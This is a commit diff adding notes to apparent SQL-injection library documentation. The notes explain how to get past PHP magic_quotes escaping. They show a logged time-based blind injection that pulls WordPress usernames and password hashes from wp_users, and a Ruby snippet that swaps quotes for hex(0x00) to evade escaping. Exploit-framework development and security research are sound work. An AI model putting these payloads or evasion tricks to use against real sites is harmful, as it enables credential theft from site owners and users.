magic_quotes

2021-01-02 13:38:15 -05:00
parent 0f70fc762b
commit e24273e9a3
1 changed files with 29 additions and 1 deletions
@@ -36,4 +36,32 @@ end

 ## Notes

-`run_sql` can only return 1 column.
+### run_sql
+
+`run_sql` can only return 1 column.
+
+### magic_quotes bypass
+
+**CAN ONLY RETURN 1 COLUMN AT A TIME**
+
+At times, PHP will use `magic_quotes` to escape `'` and `"`.  This may cause problems in the SQL injection. You'll know its a problem, because you'll see log items like this:
+
+```
+[Sat Jan 02 14:11:53.103512 2021] [php7:notice] [pid 55607] [client 2.2.2.2:36475] WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\\';\\',ifnull(user_login,\\'\\'),ifnull(user_pass,\\'\\')) as binary) mMJZrCxQ from w' at line 1 for query SELECT * FROM wp_chopslider3 WHERE chopslider_id =938076279 OR 1=1 AND if(length(cast((select group_concat(mMJZrCxQ) from (select cast(concat_ws(\\';\\',ifnull(user_login,\\'\\'),ifnull(user_pass,\\'\\')) as binary) mMJZrCxQ from wp_users limit 1) fWLwo) as binary))&1<>0,sleep(1.0),0)
+```
+
+However, the query was similar to this:
+
+```
+[*] {SQLi} Executing (select group_concat(qcO) from (select cast(concat_ws(';',to_base64(ifnull(user_login,'')),to_base64(ifnull(user_pass,''))) as binary) qcO from wp_users limit 1) dTWyw)
+```
+
+The query was sent without the escapes, however they were added.  The solution is to avoid quotes at all.  To do this, we will need to use  the `hex` encoder
+
+```
+      if payload.include?("''")
+        payload.gsub!("''", 'hex(0x00)')
+      end
+```
+
+This will convert all instances of `''` which were previously being escaped to `\'\'` to `hex(0x00)` which does not get altered.